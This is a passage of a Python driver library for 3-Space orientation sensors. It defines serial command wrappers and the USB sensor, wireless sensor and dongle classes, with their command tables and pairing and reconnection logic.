if timestamp:
return (data, t_stamp)
return data
## 44(0x2c)
def getTemperatureF(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getTemperatureF')
if timestamp:
return (data, t_stamp)
return data
## 45(0x2d)
def getConfidenceFactor(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getConfidenceFactor')
if timestamp:
return (data, t_stamp)
return data
## 64(0x40)
def getAllRawComponentSensorData(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getAllRawComponentSensorData')
if timestamp:
return (data, t_stamp)
return data
## 65(0x41)
def getRawGyroscopeRate(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getRawGyroscopeRate')
if timestamp:
return (data, t_stamp)
return data
## 66(0x42)
def getRawAccelerometerData(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getRawAccelerometerData')
if timestamp:
return (data, t_stamp)
return data
## 67(0x43)
def getRawCompassData(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getRawCompassData')
if timestamp:
return (data, t_stamp)
return data
## 96(0x60)
def tareWithCurrentOrientation(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('tareWithCurrentOrientation')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 97(0x61)
def tareWithQuaternion(self, quaternion, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('tareWithQuaternion', quaternion)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 98(0x62)
def tareWithRotationMatrix(self, rotation_matrix, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('tareWithRotationMatrix', rotation_matrix)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 99(0x63)
def setStaticAccelerometerTrustValue(self, trust_value, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setStaticAccelerometerTrustValue', trust_value)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 100(0x64)
def setConfidenceAccelerometerTrustValues(self, min_trust_value, max_trust_value, timestamp=False):
arg_list = (min_trust_value, max_trust_value)
fail_byte, t_stamp, data = self.writeRead('setConfidenceAccelerometerTrustValues', arg_list)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 101(0x65)
def setStaticCompassTrustValue(self, trust_value, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setStaticCompassTrustValue', trust_value)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 102(0x66)
def setConfidenceCompassTrustValues(self, min_trust_value, max_trust_value, timestamp=False):
arg_list = (min_trust_value, max_trust_value)
fail_byte, t_stamp, data = self.writeRead('setConfidenceCompassTrustValues', arg_list)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 103(0x67)
def setDesiredUpdateRate(self, update_rate, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setDesiredUpdateRate', update_rate)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 105(0x69)
def setReferenceVectorMode(self, mode, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setReferenceVectorMode', mode)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 106(0x6a)
def setOversampleRate(self, samples_per_iteration, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setOversampleRate', samples_per_iteration)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 107(0x6b)
def setGyroscopeEnabled(self, enabled, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setGyroscopeEnabled', enabled)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 108(0x6c)
def setAccelerometerEnabled(self, enabled, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setAccelerometerEnabled', enabled)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 109(0x6d)
def setCompassEnabled(self, enabled, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setCompassEnabled', enabled)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 116(0x74)
def setAxisDirections(self, axis_direction_byte, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setAxisDirections', axis_direction_byte)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 117(0x75)
def setRunningAveragePercent(self, running_average_percent, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setRunningAveragePercent', running_average_percent)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 118(0x76)
def setCompassReferenceVector(self, reference_vector, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setCompassReferenceVector', reference_vector)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 119(0x77)
def setAccelerometerReferenceVector(self, reference_vector, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setAccelerometerReferenceVector', reference_vector)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 120(0x78)
def resetKalmanFilter(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('resetKalmanFilter')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 121(0x79)
def setAccelerometerRange(self, accelerometer_range_setting, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setAccelerometerRange', accelerometer_range_setting)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 123(0x7b)
def setFilterMode(self, mode, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setFilterMode', mode)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 124(0x7c)
def setRunningAverageMode(self, mode, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setRunningAverageMode', mode)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 125(0x7d)
def setGyroscopeRange(self, gyroscope_range_setting, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setGyroscopeRange', gyroscope_range_setting)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 126(0x7e)
def setCompassRange(self, compass_range_setting, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setCompassRange', compass_range_setting)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 128(0x80)
def getTareAsQuaternion(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getTareAsQuaternion')
if timestamp:
return (data, t_stamp)
return data
## 129(0x81)
def getTareAsRotationMatrix(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getTareAsRotationMatrix')
if timestamp:
return (data, t_stamp)
return data
## 130(0x82)
def getAccelerometerTrustValues(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getAccelerometerTrustValues')
if timestamp:
return (data, t_stamp)
return data
## 131(0x83)
def getCompassTrustValues(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getCompassTrustValues')
if timestamp:
return (data, t_stamp)
return data
## 132(0x84)
def getCurrentUpdateRate(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getCurrentUpdateRate')
if timestamp:
return (data, t_stamp)
return data
## 133(0x85)
def getCompassReferenceVector(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getCompassReferenceVector')
if timestamp:
return (data, t_stamp)
return data
## 134(0x86)
def getAccelerometerReferenceVector(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getAccelerometerReferenceVector')
if timestamp:
return (data, t_stamp)
return data
## 140(0x8c)
def getGyroscopeEnabledState(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getGyroscopeEnabledState')
if timestamp:
return (data, t_stamp)
return data
## 141(0x8d)
def getAccelerometerEnabledState(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getAccelerometerEnabledState')
if timestamp:
return (data, t_stamp)
return data
## 142(0x8e)
def getCompassEnabledState(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getCompassEnabledState')
if timestamp:
return (data, t_stamp)
return data
## 143(0x8f)
def getAxisDirections(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getAxisDirections')
if timestamp:
return (data, t_stamp)
return data
## 144(0x90)
def getOversampleRate(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getOversampleRate')
if timestamp:
return (data, t_stamp)
return data
## 145(0x91)
def getRunningAveragePercent(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getRunningAveragePercent')
if timestamp:
return (data, t_stamp)
return data
## 146(0x92)
def getDesiredUpdateRate(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getDesiredUpdateRate')
if timestamp:
return (data, t_stamp)
return data
## 148(0x94)
def getAccelerometerRange(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getAccelerometerRange')
if timestamp:
return (data, t_stamp)
return data
## 152(0x98)
def getFilterMode(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getFilterMode')
if timestamp:
return (data, t_stamp)
return data
## 153(0x99)
def getRunningAverageMode(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getRunningAverageMode')
if timestamp:
return (data, t_stamp)
return data
## 154(0x9a)
def getGyroscopeRange(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getGyroscopeRange')
if timestamp:
return (data, t_stamp)
return data
## 155(0x9b)
def getCompassRange(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getCompassRange')
if timestamp:
return (data, t_stamp)
return data
## 156(0x9c)
def getEulerAngleDecompositionOrder(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getEulerAngleDecompositionOrder')
if timestamp:
return (data, t_stamp)
return data
## 157(0x9d)
def getMagnetoresistiveThreshold(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getMagnetoresistiveThreshold')
if timestamp:
return (data, t_stamp)
return data
## 158(0x9e)
def getAccelerometerResistanceThreshold(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getAccelerometerResistanceThreshold')
if timestamp:
return (data, t_stamp)
return data
## 159(0x9f)
def getOffsetOrientationAsQuaternion(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getOffsetOrientationAsQuaternion')
if timestamp:
return (data, t_stamp)
return data
## 160(0xa0)
def setCompassCalibrationCoefficients(self, matrix, bias, timestamp=False):
arg_list = []
arg_list.extend(matrix)
arg_list.extend(bias)
fail_byte, t_stamp, data = self.writeRead('setCompassCalibrationCoefficients', arg_list)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 161(0xa1)
def setAccelerometerCalibrationCoefficients(self, matrix, bias, timestamp=False):
arg_list = []
arg_list.extend(matrix)
arg_list.extend(bias)
fail_byte, t_stamp, data = self.writeRead('setAccelerometerCalibrationCoefficients', arg_list)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 162(0xa2)
def getCompassCalibrationCoefficients(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getCompassCalibrationCoefficients')
if timestamp:
return (data, t_stamp)
return data
## 163(0xa3)
def getAccelerometerCalibrationCoefficients(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getAccelerometerCalibrationCoefficients')
if timestamp:
return (data, t_stamp)
return data
## 164(0xa4)
def getGyroscopeCalibrationCoefficients(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getGyroscopeCalibrationCoefficients')
if timestamp:
return (data, t_stamp)
return data
## 165(0xa5)
def beginGyroscopeAutoCalibration(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('beginGyroscopeAutoCalibration')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 166(0xa6)
def setGyroscopeCalibrationCoefficients(self, matrix, bias, timestamp=False):
arg_list = []
arg_list.extend(matrix)
arg_list.extend(bias)
fail_byte, t_stamp, data = self.writeRead('setGyroscopeCalibrationCoefficients', arg_list)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 169(0xa9)
def setCalibrationMode(self, mode, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setCalibrationMode', mode)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 170(0xaa)
def getCalibrationMode(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getCalibrationMode')
if timestamp:
return (data, t_stamp)
return data
## 171(0xab)
def setOrthoCalibrationDataPointFromCurrentOrientation(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setOrthoCalibrationDataPointFromCurrentOrientation')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 172(0xac)
def setOrthoCalibrationDataPointFromVector(self, type, index, vector, timestamp=False):
arg_list = (type, index, vector)
fail_byte, t_stamp, data = self.writeRead('setOrthoCalibrationDataPointFromVector', arg_list)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 173(0xad)
def getOrthoCalibrationDataPoint(self, type, index, timestamp=False):
arg_list = (type, index)
fail_byte, t_stamp, data = self.writeRead('getOrthoCalibrationDataPoint', arg_list)
if timestamp:
return (data, t_stamp)
return data
## 174(0xae)
def performOrthoCalibration(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('performOrthoCalibration')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 175(0xaf)
def clearOrthoCalibrationData(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('clearOrthoCalibrationData')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 227(0xe3)
def setSleepMode(self, mode, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setSleepMode', mode)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 228(0xe4)
def getSleepMode(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getSleepMode')
if timestamp:
return (data, t_stamp)
return data
## 240(0xf0)
def setJoystickEnabled(self, enabled, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setJoystickEnabled', enabled)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 241(0xf1)
def setMouseEnabled(self, enabled, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setMouseEnabled', enabled)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 242(0xf2)
def getJoystickEnabled(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getJoystickEnabled')
if timestamp:
return (data, t_stamp)
return data
## 243(0xf3)
def getMouseEnabled(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getMouseEnabled')
if timestamp:
return (data, t_stamp)
return data
## 244(0xf4)
def setControlMode(self, control_class, control_index, handler_index, timestamp=False):
arg_list = (control_class, control_index, handler_index)
fail_byte, t_stamp, data = self.writeRead('setControlMode', arg_list)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 245(0xf5)
def setControlData(self, control_class, control_index, data_point_index, data_point, timestamp=False):
arg_list = (control_class, control_index, data_point_index, data_point)
fail_byte, t_stamp, data = self.writeRead('setControlData', arg_list)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 246(0xf6)
def getControlMode(self, control_class, control_index, timestamp=False):
arg_list = (control_class, control_index)
fail_byte, t_stamp, data = self.writeRead('getControlMode', arg_list)
if timestamp:
return (data, t_stamp)
return data
## 247(0xf7)
def getControlData(self, control_class, control_index, handler_index, timestamp=False):
arg_list = (control_class, control_index, handler_index)
fail_byte, t_stamp, data = self.writeRead('getControlData', arg_list)
if timestamp:
return (data, t_stamp)
return data
## 251(0xfb)
def setMouseAbsoluteRelativeMode(self, mode, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setMouseAbsoluteRelativeMode', mode)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 252(0xfc)
def getMouseAbsoluteRelativeMode(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getMouseAbsoluteRelativeMode')
if timestamp:
return (data, t_stamp)
return data
## END generated functions USB and WL_ and EM_ and DL_ and BT_
class TSUSBSensor(_TSSensor):
command_dict = _TSSensor.command_dict.copy()
command_dict.update({
'_setUARTBaudRate': (0xe7, 0, None, 4, '>I', 1),
'getUARTBaudRate': (0xe8, 4, '>I', 0, None, 1),
'getButtonState': (0xfa, 1, '>B', 0, None, 1)
})
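# Each command_dict entry appears to be (command byte, response length in bytes,
# response struct format, argument length in bytes, argument struct format,
# minimum firmware compatibility level), matching how f8WriteRead/faWriteRead
# unpack these tuples further below.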
reverse_command_dict = dict(map(lambda x: [x[1][0], x[0]], command_dict.items()))
_device_types = ["USB", "USB-HH", "MUSB", "MUSB-HH", "USBWT", "USBWT-HH"]
def __new__(cls, com_port=None, baudrate=_baudrate, timestamp_mode=TSS_TIMESTAMP_SENSOR):
if com_port is None:
return None
if com_port:
if type(com_port) is str:
port_name = com_port
elif type(com_port) is ComInfo:
port_name = com_port.com_port
else:
_print("An erronous parameter was passed in")
return None
if baudrate not in _allowed_baudrates:
baudrate = _baudrate
_print("Error baudrate value not allowed. Using default.")
serial_port = serial.Serial(port_name, baudrate=baudrate, timeout=0.5, writeTimeout=0.5)
if serial_port is not None:
new_inst = super(_TSSensor, cls).__new__(cls)
serial_port.write(bytearray((0xf7, 0x56, 0x56)))
time.sleep(0.01)
serial_port.flushInput()
return _generateSensorClass(new_inst, serial_port, TSUSBSensor._device_types)
_print('Error: serial port was not created')
## 231(0xe7)
def setUARTBaudRate(self, baud_rate, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('_setUARTBaudRate', baud_rate)
if not fail_byte:
self.baudrate = baud_rate
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## generated functions USB
## 232(0xe8)
def getUARTBaudRate(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getUARTBaudRate')
if timestamp:
return (data, t_stamp)
return data
## 250(0xfa)
def getButtonState(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getButtonState')
if timestamp:
return (data, t_stamp)
return data
## END generated functions USB
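# Example (sketch, not part of the generated API): opening a wired USB sensor on an
# assumed port name and reading one orientation sample; adjust 'COM8' for your system.
#     sensor = TSUSBSensor(com_port='COM8')
#     if sensor is not None:
#         print(sensor.getTaredOrientationAsRotationMatrix())
#         sensor.close()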
class TSWLSensor(_TSSensor):
command_dict = _TSSensor.command_dict.copy()
command_dict.update({
'_getWirelessPanID': (0xc0, 2, '>H', 0, None, 1),
'_setWirelessPanID': (0xc1, 0, None, 2, '>H', 1),
'_getWirelessChannel': (0xc2, 1, '>B', 0, None, 1),
'_setWirelessChannel': (0xc3, 0, None, 1, '>B', 1),
'commitWirelessSettings': (0xc5, 0, None, 0, None, 1),
'getWirelessAddress': (0xc6, 2, '>H', 0, None, 1),
'getBatteryVoltage': (0xc9, 4, '>f', 0, None, 1),
'getBatteryPercentRemaining': (0xca, 1, '>B', 0, None, 1),
'getBatteryStatus': (0xcb, 1, '>B', 0, None, 1),
'getButtonState': (0xfa, 1, '>B', 0, None, 1)
})
reverse_command_dict = dict(map(lambda x: [x[1][0], x[0]], command_dict.items()))
_device_types = ["WL", "WL-HH"]
def __new__(cls, com_port=None, baudrate=_baudrate, timestamp_mode=TSS_TIMESTAMP_SENSOR, logical_id=None, dongle=None):
if com_port is None and logical_id is None and dongle is None:
return None
if com_port:
if type(com_port) is str:
port_name = com_port
elif type(com_port) is ComInfo:
port_name = com_port.com_port
else:
_print("An erronous parameter was passed in")
return None
if baudrate not in _allowed_baudrates:
baudrate = _baudrate
_print("Error baudrate value not allowed. Using default.")
serial_port = serial.Serial(port_name, baudrate=baudrate, timeout=0.5, writeTimeout=0.5)
if serial_port is not None:
new_inst = super(_TSSensor, cls).__new__(cls)
new_inst.dongle = None
new_inst.logical_id = None
serial_port.write(bytearray((0xf7, 0x56, 0x56)))
time.sleep(0.01)
serial_port.flushInput()
return _generateSensorClass(new_inst, serial_port, TSWLSensor._device_types)
_print('Error: serial port was not created')
if logical_id is not None and dongle:
for tries in range(_wireless_retries + 1):
fail_byte, timestamp, serial_number = dongle.faWriteRead(logical_id, 'getSerialNumber')
if not fail_byte:
if serial_number in global_sensorlist:
rtn_inst = global_sensorlist[serial_number]
if rtn_inst.dongle:
_print("sensor was already paired before")
pass
rtn_inst.dongle = dongle
rtn_inst.logical_id = logical_id
dongle.wireless_table[logical_id] = serial_number
rtn_inst.switchToWirelessMode()
return rtn_inst
else:
new_inst = super(_TSSensor, cls).__new__(cls)
for tries in range(_wireless_retries + 1):
fail_byte, timestamp, hardware_version = dongle.faWriteRead(logical_id, 'getHardwareVersionString')
if not fail_byte:
new_inst.device_type = convertString(hardware_version)[4:-8].strip()
break
else:
new_inst.device_type = "WL"
new_inst.dongle = dongle
new_inst.logical_id = logical_id
new_inst.port_name = ""
new_inst.serial_port_settings = {}
new_inst.serial_port = None
new_inst.switchToWirelessMode()
new_inst.serial_number = serial_number
global_sensorlist[serial_number] = new_inst
return new_inst
_print("raise wireless fail error here")
return None
_print('this should never happen')
return None
def __init__(self, com_port=None, baudrate=_baudrate, timestamp_mode=TSS_TIMESTAMP_SENSOR, logical_id=None, dongle=None):
self.protocol_args = { 'success_failure': True,
'timestamp': True,
'command_echo': True,
'data_length': True}
if timestamp_mode != TSS_TIMESTAMP_SENSOR:
self.protocol_args['timestamp'] = False
self.timestamp_mode = timestamp_mode
self.baudrate = baudrate
reinit = False
try: # if this is set the class had been there before
check = self.stream_parse
reinit = True
# _print("sensor reinit!!!")
except:
self._setupBaseVariables()
self.callback_func = None
if self.serial_port and not self.data_loop:
self._setupProtocolHeader(**self.protocol_args)
self._setupThreadedReadLoop()
self.latest_lock = threading.Condition(threading.Lock())
self.new_data = False
if reinit:
if self.stream_timing is not None:
self.setStreamingTiming(*self.stream_timing)
if self.stream_slot_cmds is not None:
self.setStreamingSlots(*self.stream_slot_cmds)
def close(self):
if self.serial_port is not None:
super(TSWLSensor, self).close()
def _wirlessWriteRead(self, command, input_list=None):
result = (True, None, None)
for i in range(_wireless_retries + 1):
result = self.dongle.faWriteRead(self.logical_id, command, input_list)
if not result[0]:
break
return result
def switchToWirelessMode(self):
if self.dongle and self.logical_id is not None:
self.writeRead = self._wirlessWriteRead
self.wireless_com = True
return True
return False
def switchToWiredMode(self):
if self.serial_port:
self.writeRead = self.f9WriteRead
self.wireless_com = False
return True
return False
## 192(0xc0)
def getWirelessPanID(self, timestamp=False):
t_stamp = None
data = None
fail_byte, t_stamp, data = self.writeRead('_getWirelessPanID')
if timestamp:
return (data, t_stamp)
return data
## 193(0xc1)
def setWirelessPanID(self, PanID, timestamp=False):
t_stamp = None
fail_byte = True
if not self.wireless_com:
fail_byte, t_stamp, data = self.writeRead('_setWirelessPanID', PanID)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 194(0xc2)
def getWirelessChannel(self, timestamp=False):
t_stamp = None
data = None
fail_byte, t_stamp, data = self.writeRead('_getWirelessChannel')
if timestamp:
return (data, t_stamp)
return data
## 195(0xc3)
def setWirelessChannel(self, channel, timestamp=False):
t_stamp = None
fail_byte = True
if not self.wireless_com:
fail_byte, t_stamp, data = self.writeRead('_setWirelessChannel', channel)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## generated functions WL_
## 197(0xc5)
def commitWirelessSettings(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('commitWirelessSettings')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 198(0xc6)
def getWirelessAddress(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getWirelessAddress')
if timestamp:
return (data, t_stamp)
return data
## 201(0xc9)
def getBatteryVoltage(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getBatteryVoltage')
if timestamp:
return (data, t_stamp)
return data
## 202(0xca)
def getBatteryPercentRemaining(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getBatteryPercentRemaining')
if timestamp:
return (data, t_stamp)
return data
## 203(0xcb)
def getBatteryStatus(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getBatteryStatus')
if timestamp:
return (data, t_stamp)
return data
## 250(0xfa)
def getButtonState(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getButtonState')
if timestamp:
return (data, t_stamp)
return data
## END generated functions WL_
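# Example (sketch): a TSWLSensor is normally obtained through a paired dongle rather
# than constructed directly; 'dongle' and logical ID 0 below are assumptions.
#     wl_sensor = TSWLSensor(logical_id=0, dongle=dongle)
#     if wl_sensor is not None:
#         print(wl_sensor.getBatteryPercentRemaining())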
class TSDongle(_TSBase):
command_dict = _TSBase.command_dict.copy()
command_dict.update({
'setWirelessStreamingAutoFlushMode': (0xb0, 0, None, 1, '>B', 1),
'getWirelessStreamingAutoFlushMode': (0xb1, 1, '>B', 0, None, 1),
'_setWirelessStreamingManualFlushBitfield': (0xb2, 0, None, 2, '>H', 1),
'_getWirelessStreamingManualFlushBitfield': (0xb3, 2, '>H', 0, None, 1),
'_getManualFlushSingle': (0xb4, 0, None, 1, '>B', 1),
'_getManualFlushBulk': (0xb5, 0, None, 0, None, 1),
'broadcastSynchronizationPulse': (0xb6, 0, None, 0, None, 1),
'getReceptionBitfield': (0xb7, 2, '>H', 0, None, 1),
'getWirelessPanID': (0xc0, 2, '>H', 0, None, 1),
'setWirelessPanID': (0xc1, 0, None, 2, '>H', 1),
'getWirelessChannel': (0xc2, 1, '>B', 0, None, 1),
'setWirelessChannel': (0xc3, 0, None, 1, '>B', 1),
'commitWirelessSettings': (0xc5, 0, None, 0, None, 1),
'getWirelessAddress': (0xc6, 2, '>H', 0, None, 1),
'getSerialNumberAtLogicalID': (0xd0, 4, '>I', 1, '>B', 1),
'_setSerialNumberAtLogicalID': (0xd1, 0, None, 5, '>BI', 1),
'getWirelessChannelNoiseLevels': (0xd2, 16, '>16B', 0, None, 1),
'setWirelessRetries': (0xd3, 0, None, 1, '>B', 1),
'getWirelessRetries': (0xd4, 1, '>B', 0, None, 1),
'getWirelessSlotsOpen': (0xd5, 1, '>B', 0, None, 1),
'getSignalStrength': (0xd6, 1, '>B', 0, None, 1),
'setWirelessHIDUpdateRate': (0xd7, 0, None, 1, '>B', 1),
'getWirelessHIDUpdateRate': (0xd8, 1, '>B', 0, None, 1),
'setWirelessHIDAsynchronousMode': (0xd9, 0, None, 1, '>B', 1),
'getWirelessHIDAsynchronousMode': (0xda, 1, '>B', 0, None, 1),
'_setWirelessResponseHeaderBitfield': (0xdb, 0, None, 4, '>I', 1),
'_getWirelessResponseHeaderBitfield': (0xdc, 4, '>I', 0, None, 1),
'setJoystickLogicalID': (0xf0, 0, None, 1, '>B', 1),
'setMouseLogicalID': (0xf1, 0, None, 1, '>B', 1),
'getJoystickLogicalID': (0xf2, 1, '>B', 0, None, 1),
'getMouseLogicalID': (0xf3, 1, '>B', 0, None, 1)
})
wl_command_dict = TSWLSensor.command_dict.copy()
_device_types = ["DNG"]
def __new__(cls, com_port=None, baudrate=_baudrate, timestamp_mode=TSS_TIMESTAMP_SENSOR):
if com_port:
if type(com_port) is str:
port_name = com_port
elif type(com_port) is ComInfo:
port_name = com_port.com_port
else:
_print("An erronous parameter was passed in")
return None
if baudrate not in _allowed_baudrates:
baudrate = _baudrate
_print("Error baudrate value not allowed. Using default.")
serial_port = serial.Serial(port_name, baudrate=baudrate, timeout=0.5, writeTimeout=0.5)
if serial_port is not None:
new_inst = super(TSDongle, cls).__new__(cls)
serial_port.write(bytearray((0xf7, 0x56, 0x56)))
time.sleep(0.05)
serial_port.flushInput()
checkSoftwareVersionFromPort(serial_port)
serial_port.write(bytearray((0xf7, 0xb7, 0xb7)))
reception_bitfield = struct.unpack('>H', serial_port.read(2))[0]
idx = 1
for i in range(15):
if idx & reception_bitfield:
count = 0
serial_port.write(bytearray((0xf7, 0xd0, i, 0xd0 + i)))
wl_id = struct.unpack('>I', serial_port.read(4))[0]
while count < 15:
count += 1
serial_port.write(bytearray((0xf8, i, 0x56, 0x56 + i)))
did_fail = struct.unpack('>B', serial_port.read(1))[0]
if did_fail:
serial_port.read(1)
else:
_print("Stopped {0:08X} on try {1:d}".format(wl_id, count))
serial_port.read(2)
break
idx <<= 1
return _generateSensorClass(new_inst, serial_port, TSDongle._device_types)
_print('Error: serial port was not created')
def __init__(self, com_port=None, baudrate=_baudrate, timestamp_mode=TSS_TIMESTAMP_SENSOR):
self.protocol_args = { 'success_failure': True,
'timestamp': True,
'command_echo': True,
'logical_id': True,
'data_length': True}
if timestamp_mode != TSS_TIMESTAMP_SENSOR:
self.protocol_args['timestamp'] = False
self.timestamp_mode = timestamp_mode
self.baudrate = baudrate
reinit = False
try: # if this is set the class had been there before
check = self.wireless_table
reinit = True
# _print("sensor reinit!!!")
except:
self._setupBaseVariables()
self._setupProtocolHeader(**self.protocol_args)
self._setupThreadedReadLoop()
self.setWirelessStreamingAutoFlushMode(1)
self.startStreaming()
def reconnect(self):
self.close()
if not tryPort(self.port_name):
_print("tryport fail")
try:
serial_port = serial.Serial(self.port_name, baudrate=self.baudrate, timeout=0.5, writeTimeout=0.5)
serial_port.applySettingsDict(self.serial_port_settings)
self.serial_port = serial_port
self.setWirelessStreamingAutoFlushMode(0)
time.sleep(0.05)
self.serial_port.flushInput()
for i in range(15):
serial_port.write(bytearray((0xf7, 0xd0, i, 0xd0 + i)))
for i in range(10):
try:
wl_id = struct.unpack('>I', serial_port.read(4))[0]
except:
continue
break
if wl_id != 0:
count = 0
while count < 25:
count += 1
serial_port.write(bytearray((0xf8, i, 0x56, 0x56 + i)))
did_fail = struct.unpack('>B', serial_port.read(1))[0]
if did_fail:
serial_port.read(1)
else:
_print("Stopped {0:08X} on try {1:d}".format(wl_id, count))
serial_port.read(2)
break
except:
traceback.print_exc()
return False
self._setupProtocolHeader(**self.protocol_args)
self._setupThreadedReadLoop()
self.setWirelessStreamingAutoFlushMode(1)
return True
def _setupBaseVariables(self):
self.serial_number_hex = '{0:08X}'.format(self.serial_number)
self.wireless_table = [0] * 15
for i in range(15):
tmp_id = self.f7WriteRead('getSerialNumberAtLogicalID', i)
if tmp_id not in self.wireless_table or tmp_id == 0:
